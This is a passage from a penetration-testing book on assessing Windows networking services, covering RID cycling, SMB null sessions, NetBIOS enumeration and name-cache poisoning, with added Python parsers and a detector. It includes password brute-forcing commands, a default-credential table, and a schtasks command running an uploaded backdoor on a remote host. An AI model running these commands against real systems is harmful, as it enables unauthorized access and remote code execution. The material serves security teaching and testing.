user:[donald] rid:[0x3ec]
user:[Guest] rid:[0x1f5]
user:[IUSR_WEBSERV] rid:[0x3e9]
user:[IWAM_WEBSERV] rid:[0x3ea]
user:[test] rid:[0x3ed]
user:[TsInternetUser] rid:[0x3e8]

The rpcclient tool is extremely powerful and versatile; it allows user accounts to be created remotely and privileges to be elevated. However, this functionality requires a valid username and password combination, often necessitating the use of brute force.
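The RID cycling walk in Example 10-9 and the RID 500 observation in the earlier tip both come down to arithmetic on SIDs, so the following added example (not from the book or from Samba) shows the pieces a practitioner ends up scripting: parsing and re-encoding a SID in the binary form LSARPC and SAMR carry on the wire, generating the candidate SIDs for a RID range, parsing `lookupsids` output while stopping after a run of NT_STATUS_NONE_MAPPED results, and flagging well-known RIDs whose account has been renamed. The sample output is constructed from Example 10-9, with a renamed Administrator (RID 500) and a trailing “late” account added to show the stop rule; the “(1)” type suffix on each line is optional to the parser.

```python
import re
import struct

WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt"}
NONE_MAPPED = "NT_STATUS_NONE_MAPPED"

def parse_sid(text):
    """'S-1-5-21-a-b-c-1003' -> (revision, identifier authority, [sub-authorities])."""
    parts = text.strip().split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError("malformed SID: %r" % text)
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]

def sid_to_bytes(text):
    """Binary SID as LSARPC/SAMR carry it: revision, sub-authority count,
    48-bit identifier authority big-endian, then each sub-authority little-endian."""
    rev, auth, subs = parse_sid(text)
    return (struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(blob):
    rev, count = struct.unpack("<BB", blob[:2])
    auth = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-%d-%d-%s" % (rev, auth, "-".join(str(s) for s in subs))

def domain_sid(account_sid):
    """Everything but the trailing RID identifies the domain (or local machine)."""
    return account_sid.rsplit("-", 1)[0]

def rid_cycle_targets(account_sid, start, end):
    """Candidate SIDs to feed to lookupsids: typically 500-502, then 1000 upwards."""
    base = domain_sid(account_sid)
    return ["%s-%d" % (base, rid) for rid in range(start, end + 1)]

# "S-1-5-21-...-1003 WEBSERV\chris (1)"; the trailing "(type)" may be absent
LOOKUP_RE = re.compile(r"^(S-\d+-\d+(?:-\d+)+)\s+(\S+?)(?:\s+\((\d+)\))?$")

def parse_lookupsids(output, give_up_after=5):
    """Map RID -> (domain, account) from rpcclient lookupsids output, stopping after a
    run of unmapped RIDs, which is the sign you have walked past the last account."""
    found, misses = {}, 0
    for line in output.splitlines():
        line = line.strip()
        if NONE_MAPPED in line:
            misses += 1
            if misses >= give_up_after:
                break
            continue
        m = LOOKUP_RE.match(line)
        if not m:
            continue
        misses = 0
        rid = int(m.group(1).rsplit("-", 1)[1])
        domain, _, account = m.group(2).partition("\\")
        found[rid] = (domain, account)
    return found

def renamed_well_known(found):
    """Well-known RIDs whose account name differs from the default (a renamed Administrator)."""
    return {rid: found[rid][1] for rid, default in WELL_KNOWN_RIDS.items()
            if rid in found and found[rid][1].lower() != default.lower()}

# Constructed from Example 10-9; RID 500 renamed and RID 1012 added for illustration.
SAMPLE_LOOKUPSIDS = r"""
S-1-5-21-1177238915-1563985344-1957994488-500 WEBSERV\sysop (1)
S-1-5-21-1177238915-1563985344-1957994488-501 WEBSERV\Guest (1)
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERV\IUSR_WEBSERV (1)
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERV\IWAM_WEBSERV (1)
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERV\chris (1)
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERV\donald (1)
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV\test (1)
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERV\daffy (1)
result was NT_STATUS_NONE_MAPPED
result was NT_STATUS_NONE_MAPPED
result was NT_STATUS_NONE_MAPPED
result was NT_STATUS_NONE_MAPPED
result was NT_STATUS_NONE_MAPPED
S-1-5-21-1177238915-1563985344-1957994488-1012 WEBSERV\late (1)
"""

if __name__ == "__main__":
    user_sid = "S-1-5-21-1177238915-1563985344-1957994488-1003"
    print("wire form:", sid_to_bytes(user_sid).hex())
    print("targets:", rid_cycle_targets(user_sid, 1001, 1003))
    found = parse_lookupsids(SAMPLE_LOOKUPSIDS)
    for rid in sorted(found):
        print("%5d  %s\\%s" % (rid, *found[rid]))
    print("renamed:", renamed_well_known(found))
```

Because the walk stops after five consecutive unmapped RIDs, the 1012 account in the sample is never reported; raise `give_up_after` when a domain is known to have gaps in its RID sequence from deleted accounts.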

SMB null sessions and hardcoded named pipes

Jean-Baptiste Marchand posted an advisory to BugTraq on July 7, 2005 (http://marc.info/?l=bugtraq&m=112076409813099&w=2), describing a flaw within Windows 2003 SP1, Windows XP SP2, Windows 2000 SP4, and Windows NT 4.0 systems, allowing for an anonymous SMB null session to be established with NetBIOS and CIFS services, which in turn can be used to anonymously access RPC server named pipe interfaces, as follows:

  • Local Security Authority (LSA) RPC server (\pipe\lsarpc)

  • LSA Security Account Manager (SAM) RPC server (\pipe\samr)

  • LSA Netlogon RPC server (\pipe\netlogon)

  • Service Control Manager (SCM) RPC server (\pipe\svcctl)

  • Eventlog service RPC server (\pipe\eventlog)

  • Server service RPC server (\pipe\srvsvc)

  • Workstation service RPC server (\pipe\wkssvc)

These service endpoints can be queried using tools such as Samba rpcclient, allowing remote unauthenticated attackers to enumerate users and groups, view running services, and view the server event logs under Windows NT 4.0 and Windows 2000 SP4 in their default configurations. Windows Server 2003 Active Directory and domain controllers are also susceptible, although Windows XP SP2 is largely shielded from these vulnerabilities.

Jean-Baptiste Marchand’s presentation covering null sessions and RPC named pipes is available from http://www.hsc.fr/ressources/presentations/null_sessions/. He discusses hardcoded named pipes that are present in Windows XP SP1 and earlier, and how these can be used to proxy RPC queries and commands to other RPC named pipe interfaces that run within the same service instance server-side.

Brute-Forcing Administrator Passwords

In 2002, the Chinese hacking group netXeyes developed WMICracker (http://www.netxeyes.org/wmicracker.exe). The tool accesses DCOM Windows Management Instrumentation (WMI) components to brute-force passwords of users in the Administrators group.

Example 10-11 shows WMICracker in use against port 135 of 192.168.189.1 to brute-force the Administrator password using the dictionary file words.txt.

Example 10-11. Using WMICracker to brute-force the Administrator password
C:\> WMICracker 192.168.189.1 Administrator words.txt

WMICracker 0.1, Protype for Fluxay5. by netXeyes 2002.08.29
http://www.netXeyes.com, [email protected]

Waiting For Session Start....
Testing qwerty...Access is denied.
Testing password...Access is denied.
Testing secret...Access is denied.

Administrator's Password is control

The venom utility also brute-forces user passwords across WMI. At the time of writing, venom is available at http://www.cqure.net/tools/venom-win32-1_1_5.zip.

Enumerating System Details Through WMI

WMIdump (http://www.cqure.net/wp/?page_id=28) is a Windows tool that can be used to query the WMI subsystem and dump useful internal system information. At the time of writing, the current binary is available from http://www.cqure.net/tools/wmidump-dotnet-1_3_0.zip.

In particular, WMIdump is used to enumerate the following for a given Windows host:

  • Operating system and computer details

  • System accounts and users

  • Installed hotfixes

  • Running processes

  • Running services and settings

  • Installed software and patch levels

  • Network adapters installed and associated settings

  • Serial port and modem settings

  • Logical disks

WMIdump is shown in Example 10-12 dumping system details, including user accounts, from the remote host over WMI.

Example 10-12. Using WMIdump to enumerate valid user details
C:\> WMIdump -c configstandard.config -u Administrator -p control -t 192.168.189.2

WMIDump v1.3.0 by [email protected]
-----------------------------------
Dumping 192.168.189.2:Win32_Process
Dumping 192.168.189.2:Win32_LogicalDisk
Dumping 192.168.189.2:Win32_NetworkConnection
Dumping 192.168.189.2:Win32_ComputerSystem
Dumping 192.168.189.2:Win32_OperatingSystem
Dumping 192.168.189.2:Win32_Service
Dumping 192.168.189.2:Win32_SystemUsers
Dumping 192.168.189.2:Win32_ScheduledJob
Dumping 192.168.189.2:Win32_Share
Dumping 192.168.189.2:Win32_SystemAccount
Dumping 192.168.189.2:Win32_LogicalProgramGroup
Dumping 192.168.189.2:Win32_Desktop
Dumping 192.168.189.2:Win32_Environment
Dumping 192.168.189.2:Win32_SystemDriver
Dumping 192.168.189.2:Win32_NetworkClient
Dumping 192.168.189.2:Win32_NetworkProtocol
Dumping 192.168.189.2:Win32_ComputerSystemProduct
Dumping 192.168.189.2:Win32_QuickFixEngineering

C:\> dir 192.168.189.2
 Volume in drive C is HARDDISK
 Volume Serial Number is 846A-8EA9

 Directory of C:\192.168.189.2

08/07/2007  17:52    <DIR>          .
08/07/2007  17:52    <DIR>          ..
08/07/2007  17:52             1,183 Win32_ComputerSystem.dmp
08/07/2007  17:52               196 Win32_ComputerSystemProduct.dmp
08/07/2007  17:52               912 Win32_Desktop.dmp
08/07/2007  17:52             2,747 Win32_Environment.dmp
08/07/2007  17:52               768 Win32_LogicalDisk.dmp
08/07/2007  17:52            18,387 Win32_LogicalProgramGroup.dmp
08/07/2007  17:52               717 Win32_NetworkClient.dmp
08/07/2007  17:52                 0 Win32_NetworkConnection.dmp
08/07/2007  17:52             6,655 Win32_NetworkProtocol.dmp
08/07/2007  17:52             1,573 Win32_OperatingSystem.dmp
08/07/2007  17:52            24,848 Win32_Process.dmp
08/07/2007  17:52            17,032 Win32_QuickFixEngineering.dmp
08/07/2007  17:52                 0 Win32_ScheduledJob.dmp
08/07/2007  17:52            38,241 Win32_Service.dmp
08/07/2007  17:52               274 Win32_Share.dmp
08/07/2007  17:52             2,382 Win32_SystemAccount.dmp
08/07/2007  17:52            55,184 Win32_SystemDriver.dmp
08/07/2007  17:52             1,262 Win32_SystemUsers.dmp
              18 File(s)        172,361 bytes
               2 Dir(s)     103,497,728 bytes free

C:\> type 192.168.189.2\Win32_SystemUsers.dmp
GroupComponent;PartComponent;
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:
Win32_UserAccount.Name="Administrator",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:
Win32_UserAccount.Name="ASPNET",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:
Win32_UserAccount.Name="Guest",Domain="OFFICE";
\\WEBSERV\root\cimv2:Win32_ComputerSystem.Name="WEBSERV";\\WEBSERV\root\cimv2:
Win32_UserAccount.Name="__vmware_user__",Domain="OFFICE";

Executing Arbitrary Commands

After compromising a valid password of a user in the Administrators group, you can execute commands through the Task Scheduler interface. To do so, Urity developed a Windows utility called Remoxec; it’s available from http://www.securityfriday.com and the O’Reilly tools archive at http://examples.oreilly.com/networksa/tools/remoxec101.zip. Figure 10-2 shows the tool in use; it requires the target IP address and valid credentials.

Figure 10-2. Remoxec is used to run commands remotely

The NetBIOS Name Service

The NetBIOS name service is accessible through UDP port 137. The service processes NetBIOS Name Table (NBT) requests in environments where Windows is being used along with workgroups, domains, or Active Directory components.

Enumerating System Details

You can easily enumerate the following system details by querying the name service:

  • NetBIOS hostname

  • The domain of which the system is a member

  • Authenticated users currently using the system

  • Accessible network interface MAC addresses

The built-in Windows nbtstat command can enumerate these details remotely. Example 10-13 shows how it can be run against 192.168.189.1.

Example 10-13. Using nbtstat to dump the NetBIOS name table
C:\> nbtstat -A 192.168.189.1

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WEBSERV        <00>  UNIQUE      Registered
    WEBSERV        <20>  UNIQUE      Registered
    OSG-WHQ        <00>  GROUP       Registered
    OSG-WHQ        <1E>  GROUP       Registered
    OSG-WHQ        <1D>  UNIQUE      Registered
    __MSBROWSE__   <01>  GROUP       Registered
    WEBSERV        <03>  UNIQUE      Registered
    __VMWARE_USER__<03>  UNIQUE      Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 00-50-56-C0-A2-09

Example 10-13 shows that the hostname is WEBSERV, the domain is OSG-WHQ, and the two currently logged-in users are __vmware_user__ and Administrator. Table 10-5 lists common NetBIOS name codes and their descriptions.

Table 10-5. Common NetBIOS Name Table names and descriptions

NetBIOS code       Type     Information obtained
-----------------  -------  --------------------------------------------------------------
<00>               UNIQUE   Hostname
<00>               GROUP    Domain name
<host name><03>    UNIQUE   Messenger service running for that computer
<user name><03>    UNIQUE   Messenger service running for that individual logged-in user
<20>               UNIQUE   Server service running
<1D>               GROUP    Master browser name for the subnet
<1B>               UNIQUE   Domain master browser name, identifies the PDC for that domain
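As an added example (not from the book or any of the tools it describes), the following Python parses nbtstat -A output and applies the Table 10-5 suffix meanings to it, so that an auditor reviewing many hosts can see at a glance what each one exposes over UDP port 137 before deciding what to filter. The sample output is constructed from Example 10-13, and the <03> handling (the host's own name means the Messenger service, any other name is a logged-in user) follows the table.

```python
import re

# Constructed sample, modelled on the nbtstat -A output shown in Example 10-13.
SAMPLE_NBTSTAT = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WEBSERV        <00>  UNIQUE      Registered
    WEBSERV        <20>  UNIQUE      Registered
    OSG-WHQ        <00>  GROUP       Registered
    OSG-WHQ        <1E>  GROUP       Registered
    OSG-WHQ        <1D>  UNIQUE      Registered
    __MSBROWSE__   <01>  GROUP       Registered
    WEBSERV        <03>  UNIQUE      Registered
    __VMWARE_USER__<03>  UNIQUE      Registered
    ADMINISTRATOR  <03>  UNIQUE      Registered

    MAC Address = 00-50-56-C0-A2-09
"""

# One table row: up to 15 name characters, a two-digit hex suffix in angle brackets
# (with no space before it when the name fills all 15 characters), the type, the status.
ROW_RE = re.compile(r"^\s*(\S.{0,14}?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_name_table(text: str) -> list[tuple[str, str, str, str]]:
    """Return (name, suffix, type, status) for every row of the remote name table."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, suffix.upper(), kind, status))
    return rows


def summarize(text: str) -> dict:
    """Map the parsed rows onto the Table 10-5 meanings of each suffix/type pair."""
    rows = parse_name_table(text)
    info = {"hostname": None, "domain": None, "logged_in_users": [],
            "server_service": False, "master_browser": False,
            "domain_master_browser": False, "mac": None, "unclassified": []}
    for name, suffix, kind, _status in rows:
        if suffix == "00" and kind == "UNIQUE":
            info["hostname"] = name
        elif suffix == "00" and kind == "GROUP":
            info["domain"] = name
        elif suffix == "20" and kind == "UNIQUE":
            info["server_service"] = True          # file/print server service is up
        elif suffix == "1D":
            info["master_browser"] = True          # master browser for the subnet
        elif suffix == "1B" and kind == "UNIQUE":
            info["domain_master_browser"] = True   # identifies the PDC for the domain
        elif suffix != "03":
            info["unclassified"].append(f"{name}<{suffix}> {kind}")
    # <03> UNIQUE entries are Messenger registrations: the computer's own name only
    # says the service is running; every other name is a currently logged-in user.
    for name, suffix, kind, _status in rows:
        if suffix == "03" and kind == "UNIQUE" and name != info["hostname"]:
            info["logged_in_users"].append(name)
    m = MAC_RE.search(text)
    info["mac"] = m.group(1) if m else None
    return info


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_NBTSTAT).items():
        print(f"{key:>22}: {value}")
```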

Attacking the NetBIOS Name Service

The NetBIOS name service is vulnerable to a number of attacks if UDP port 137 is accessible from the Internet or an untrusted network. MITRE CVE lists these issues, shown in Table 10-6.

Table 10-6. NetBIOS name service vulnerabilities

CVE name        Date         Notes
--------------  -----------  --------------------------------------------------------------
CVE-2003-0661   03/09/2003   NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include
                             random memory in a response to a NBNS query, which can allow
                             remote attackers to obtain sensitive information.
CVE-2000-0673   27/07/2000   NBNS doesn’t perform authentication, which allows remote
                             attackers to cause a denial-of-service by sending a spoofed
                             Name Conflict or Name Release datagram.
CVE-1999-0288   25/09/1999   Malformed NBNS traffic results in WINS crash.

The NetBIOS Datagram Service

The NetBIOS datagram service is accessible through UDP port 138. Just as the NetBIOS name service is vulnerable to various naming attacks (some resulting in denial of service), the NetBIOS datagram service can be used to manipulate the target host and its NetBIOS services.

Anthony Osborne of PGP COVERT Labs published an advisory in August 2000 that documented a NetBIOS name cache corruption attack that can be launched by sending crafted UDP datagrams to port 138. The full advisory is available at http://www.securityfocus.com/advisories/2556.

RFC 1002 defines the way in which Windows NetBIOS host information is encapsulated within the NetBIOS datagram header. When a browse frame request is received (on UDP port 138), Windows extracts the information from the datagram header and stores it in the NetBIOS name cache. In particular, the source NetBIOS name and IP address are blindly extracted from the datagram header and inserted into the cache.

A useful scenario in which to undertake this attack would be to send the target host a crafted NetBIOS datagram that mapped a known NetBIOS name on the internal network (such as a domain controller) to your IP address. When the target host attempted to connect to the server by its NetBIOS name, it would instead connect to your IP address. An attacker can use Cain & Abel (http://www.oxid.it) to capture rogue SMB password hashes in this scenario (which he can then crack and use to access other hosts).

Interestingly, Microsoft didn’t release a patch for this issue: due to the unauthenticated nature of NetBIOS naming, it’s a fundamental vulnerability! The MITRE CVE contains good background information within CVE-2000-1079.
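To show why the header fields matter to a defender, here is an added Python example (not from the book or from the PGP COVERT Labs advisory) that decodes the RFC 1002 datagram header and first-level encoded names of a UDP port 138 packet, and flags a datagram whose header SOURCE_IP disagrees with the IP-layer sender or whose source name is a known server announced from the wrong address. The KNOWN_NAMES mapping and the sample datagrams are constructed for this example; a real monitor would feed it captured port 138 payloads together with the IP source of each packet.

```python
import struct

# RFC 1002 section 4.4.1: fixed part of a DIRECT_UNIQUE / DIRECT_GROUP / BROADCAST
# datagram header: MSG_TYPE, FLAGS, DGM_ID, SOURCE_IP, SOURCE_PORT, DGM_LENGTH, PACKET_OFFSET
DGM_HEADER = struct.Struct("!BBH4sHHH")
DATAGRAM_TYPES = {0x10: "DIRECT_UNIQUE", 0x11: "DIRECT_GROUP", 0x12: "BROADCAST"}

# Constructed for this example: NetBIOS names the defender cares about and the address
# each should come from (OSG-SERV at 192.168.189.1 is the host seen in Example 10-16).
KNOWN_NAMES = {"OSG-SERV": "192.168.189.1"}


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """RFC 1002 first-level encoding: the 15-character name plus one suffix byte, each
    byte split into two nibbles, each nibble written as 'A' + nibble (32 characters)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    label = bytes(c for byte in raw for c in (0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))
    return bytes([32]) + label + b"\x00"   # length byte, label, empty scope terminator


def decode_netbios_name(data: bytes, offset: int) -> tuple[str, int, int]:
    """Decode one encoded name at offset; return (name, suffix, offset after the name)."""
    if offset >= len(data) or data[offset] != 32:
        raise ValueError("first label of a NetBIOS name must be 32 bytes long")
    label = data[offset + 1:offset + 33]
    if len(label) != 32 or any(not 0x41 <= c <= 0x50 for c in label):
        raise ValueError("name label contains characters outside 'A'..'P'")
    raw = bytes(((label[i] - 0x41) << 4) | (label[i + 1] - 0x41) for i in range(0, 32, 2))
    if data[offset + 33:offset + 34] != b"\x00":
        raise ValueError("scope identifiers are not supported by this parser")
    return raw[:15].decode("ascii").rstrip(" "), raw[15], offset + 34


def parse_datagram(packet: bytes) -> dict:
    """Parse the datagram header and the two encoded names that follow it."""
    if len(packet) < DGM_HEADER.size:
        raise ValueError("packet shorter than the datagram header")
    msg_type, flags, dgm_id, src_ip, src_port, dgm_len, _offset = DGM_HEADER.unpack_from(packet)
    if msg_type not in DATAGRAM_TYPES:
        raise ValueError(f"not a data-carrying datagram (MSG_TYPE 0x{msg_type:02x})")
    src_name, src_suffix, pos = decode_netbios_name(packet, DGM_HEADER.size)
    dst_name, dst_suffix, pos = decode_netbios_name(packet, pos)
    return {
        "type": DATAGRAM_TYPES[msg_type], "flags": flags, "dgm_id": dgm_id,
        "source_ip": ".".join(str(b) for b in src_ip), "source_port": src_port,
        "dgm_length": dgm_len, "source_name": src_name, "source_suffix": src_suffix,
        "dest_name": dst_name, "dest_suffix": dst_suffix, "user_data": packet[pos:],
    }


def check_datagram(packet: bytes, ip_src: str) -> list[str]:
    """Findings for one port 138 datagram, given the IP-layer source it arrived from.
    The header's SOURCE_IP and SOURCE_NAME are what Windows copies into its name cache
    without checking, so a header that disagrees with the real sender, or a known
    server name announced from an unexpected address, is what the attack looks like."""
    d = parse_datagram(packet)
    findings = []
    if d["source_ip"] != ip_src:
        findings.append(f"header SOURCE_IP {d['source_ip']} differs from IP source {ip_src}")
    expected = KNOWN_NAMES.get(d["source_name"])
    if expected is not None and (d["source_ip"] != expected or ip_src != expected):
        findings.append(f"{d['source_name']}<{d['source_suffix']:02X}> announced as "
                        f"{d['source_ip']} by {ip_src}; expected {expected}")
    return findings


def build_sample(source_name: str, claimed_ip: str, dest_name: str, payload: bytes) -> bytes:
    """Constructed fixture only: a DIRECT_GROUP datagram with the given header fields."""
    body = encode_netbios_name(source_name, 0x20) + encode_netbios_name(dest_name, 0x1D) + payload
    claimed = bytes(int(octet) for octet in claimed_ip.split("."))
    return DGM_HEADER.pack(0x11, 0x02, 0x1234, claimed, 138, len(body), 0) + body


# (label, datagram, IP-layer source address it was received from)
SAMPLES = [
    ("legitimate", build_sample("OSG-SERV", "192.168.189.1", "OSG-WHQ", b"\x00"), "192.168.189.1"),
    ("name hijack", build_sample("OSG-SERV", "192.168.189.66", "OSG-WHQ", b"\x00"), "192.168.189.66"),
    ("forged header", build_sample("OSG-SERV", "192.168.189.1", "OSG-WHQ", b"\x00"), "10.0.0.5"),
]

if __name__ == "__main__":
    for label, packet, sender in SAMPLES:
        print(f"{label:>14}: {check_datagram(packet, sender) or ['no findings']}")
```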

The NetBIOS Session Service

The NetBIOS session service is accessible through TCP port 139. In particular, the service facilitates authentication across a Windows workgroup or domain and provides access to resources (such as files and printers). You can perform the following attacks against the NetBIOS session service:

  • Enumerate details of users, shared folders, security policies, and domain information

  • Brute-force user passwords

After authenticating with the NetBIOS session service as a privileged user, you can:

  • Upload and download files and programs

  • Schedule and run arbitrary commands on the target host

  • Access the registry and modify keys

  • Access the SAM password database for cracking

Tip

The CESG CHECK guidelines specify that candidates should be able to enumerate system details through NetBIOS (including users, groups, shares, domains, domain controllers, and password policies), including user enumeration through RID cycling. After enumerating system information, candidates are required to brute-force valid user passwords and access the filesystem and registry of the remote host upon authenticating.

Enumerating System Details

Various tools can enumerate sensitive information from a target Windows host with TCP port 139 open. Information can be collected either anonymously by initiating what is known as a null session, or through knowledge of a valid username and password. A null session is when you authenticate with the IPC$ share of the target host in the following manner:

          net use \\target\IPC$ "" /user:""

By specifying a null username and password, you gain anonymous access to IPC$. By default, Windows hosts allow anonymous access to system and network information through NetBIOS, so the following can be gleaned:

  • User list

  • Machine list

  • NetBIOS name list

  • Share list

  • Password policy information

  • Group and member list

  • Local Security Authority (LSA) policy information

  • Trust information between domains and hosts

Here are three Windows command-line tools that are commonly used to enumerate this information:

enum (http://razor.bindview.com/tools/files/enum.tar.gz)
winfo (http://www.ntsecurity.nu/toolbox/winfo/)
GetAcct (http://www.securityfriday.com)

Many other tools can perform enumeration through null sessions; however, I find that these three utilities give excellent results in terms of user, system, and policy details.

enum

Jordan Ritter’s enum utility is a Windows command-line tool that can extensively query the NetBIOS session service. The tool can list usernames, password policy, shares, and details of other hosts including domain controllers. Example 10-14 shows the enum usage information.

Example 10-14. Enum usage and command-line options
D:\enum> enum
usage:  enum  [switches]  [hostname|ip]
  -U:  get userlist
  -M:  get machine list
  -N:  get namelist dump (different from -U|-M)
  -S:  get sharelist
  -P:  get password policy information
  -G:  get group and member list
  -L:  get LSA policy information
  -D:  dictionary crack, needs -u and -f
  -d:  be detailed, applies to -U and -S
  -c:  don't cancel sessions
  -u:  specify username to use (default "")
  -p:  specify password to use (default "")
  -f:  specify dictfile to use (wants -D)

By default, the tool attempts to use an anonymous null session to enumerate system information. You can, however, specify a username and password from the command line or even use the -D flag along with -u and -f <filename> options to perform brute-force grinding of a valid user password against the NetBIOS session service.

Any combination of the query flags can be used within a single command. Example 10-15 shows enum being used to enumerate user and group details and password policy information.

Example 10-15. Using enum to find system details
D:\enum> enum -UGP 192.168.189.1
server: 192.168.189.1
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
getting user list (pass 1, index 0)... success, got 5.
  __vmware_user__  Administrator  Guest  Mickey  VUSR_OSG-SERV
Group: Administrators
OSG-SERV\Administrator
Group: Backup Operators
Group: Guests
OSG-SERV\Guest
Group: Power Users
OSG-SERV\Mickey
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: __vmware__
OSG-SERV\__vmware_user__
cleaning up... success.

These details show that the out-of-box default Windows 2000 password policy is in place (no minimum password length or account lockout threshold). Along with the standard Administrator, Guest, and other system accounts, the user Mickey is also present.

winfo

The winfo utility gives a good overview of the target Windows host through a null session. It collects information that enum doesn’t, including domain trust details and currently logged-in users. Example 10-16 demonstrates winfo in use.

Example 10-16. Using winfo to enumerate system information
D:\> winfo 192.168.189.1
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
          - http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:
 - OS version: 5.0

DOMAIN INFORMATION:
 - Primary domain (legacy): OSG-WHQ
 - Account domain: OSG-SERV
 - Primary domain: OSG-WHQ
 - DNS name for primary domain:
 - Forest DNS name for primary domain:

PASSWORD POLICY:
 - Time between end of logon time and forced logoff: No forced logoff
 - Maximum password age: 42 days
 - Minimum password age: 0 days
 - Password history length: 0 passwords
 - Minimum password length: 0 characters

LOCOUT POLICY:
 - Lockout duration: 30 minutes
 - Reset lockout counter after 30 minutes
 - Lockout threshold: 0

SESSIONS:
 - Computer: OSG-SERV
 - User: ADMINISTRATOR

LOGGED IN USERS:

 * __vmware_user__
 * Administrator

USER ACCOUNTS:

 * Administrator
   (This account is the built-in administrator account)
 * Guest
   (This account is the built-in guest account)
 * mickey
 * VUSR_OSG-SERV
 * __vmware_user__

WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:

SHARES:

 * IPC$
    - Type: Unknown
    - Remark: Remote IPC
 * D$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Default share
 * ADMIN$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Remote Admin
 * C$
    - Type: Special share reserved for IPC or administrative share
    - Remark: Default share

By default, Windows systems share all drive letters in use, such as C$ and D$ in the examples here. These shares can be accessed remotely upon authenticating, allowing you to upload and download data. The other shares shown here (IPC$ and ADMIN$) are for administrative purposes, such as installing software and managing processes running on the host remotely.

GetAcct

GetAcct is a useful tool that allows you to perform reverse-lookups for Windows server RID values to get user account names (also known as RID cycling). Standard enumeration tools such as enum and winfo simply use forward-lookup techniques to dump the user list, which administrators can protect against by setting RestrictAnonymous=1 within the system registry (discussed later under the "Windows Networking Services Countermeasures" section).

Windows NT 4.0 hosts can only set RestrictAnonymous=1, and are thus susceptible to RID cycling. Windows 2000 hosts have extended anonymous access protection which can be set with RestrictAnonymous=2, preventing RID cycling from being effective. Figure 10-3 shows GetAcct in action against a Windows 2000 host at 192.168.189.1.

Figure 10-3. GetAcct performs RID cycling to enumerate users

Brute-Forcing User Passwords

The SMBCrack and SMB-AT tools can brute-force user passwords through the NetBIOS session service; they are available from the following sites:

http://www.netxeyes.org/smbcrack.exe
http://www.cqure.net/tools/smbat-win32bin-1.0.4.zip
http://www.cqure.net/tools/smbat-src-1.0.5.tar.gz

Table 10-7 shows a short list of common Windows login and password combinations. Backup and management software including ARCserve and Tivoli require dedicated user accounts on the server or local machine to function, and are often set with weak passwords.

Table 10-7. High-probability user login and password combinations

User login name   Password
----------------  ------------------
Administrator     (blank)
arcserve          arcserve, backup
tivoli            tivoli
backupexec        backupexec, backup
test              test

Warning

Before launching a brute-force password-grinding exercise, it is sensible to enumerate the account lockout policy for the system you are going to attack, as shown in Example 10-15 and Example 10-16. If you launch a brute-force attack against a domain controller that is set to lock accounts after a specified number of unsuccessful login attempts, you can easily lock out the entire domain.

Authenticating with NetBIOS

Upon cracking a valid user account password, you can authenticate with NetBIOS by using the net command from a Windows platform or a tool such as smbclient in Unix-like environments with Samba (http://www.samba.org) installed. The net command usage is as follows:

          net use \\target\IPC$ password /user:username

You can also use the net utility to authenticate with ADMIN$ or administrative drive shares (C$, D$, etc.). After successfully authenticating, you can try to execute commands server-side, upload and download files, and modify registry keys.

Executing Commands

You can execute local commands through SMB via the Service Control Manager (SCM) or the Task Scheduler. To execute commands through the Task Scheduler, we use the Windows schtasks command after authenticating with the ADMIN$ share over the NetBIOS session or CIFS service. The schtasks command schedules programs to run at a designated time through the Task Scheduler service. Example 10-17 shows how I authenticate against 192.168.189.1 (with the username Administrator and password secret) and then schedule c:\temp\o2k.exe (a known backdoor that I have uploaded) to run at 10:30.

Example 10-17. Scheduling a task on a remote host using schtasks
C:\> schtasks /create /s 192.168.189.1 /u WEBSERV\Administrator /p secret /sc ONCE
    /st 10:30:00 /tr c:\temp\o2k.exe /tn BackupExec

schtasks has a lot of options and flags that can be set and used. Please review Microsoft KB article 814596 (http://support.microsoft.com/kb/814596) for further details and use cases. We can review pending jobs on 192.168.189.1 in the following way:

C:\> schtasks /query /s 192.168.189.1

TaskName                             Next Run Time            Status
==================================== ======================== ===============
BackupExec                           10:30:00, 08/07/2007

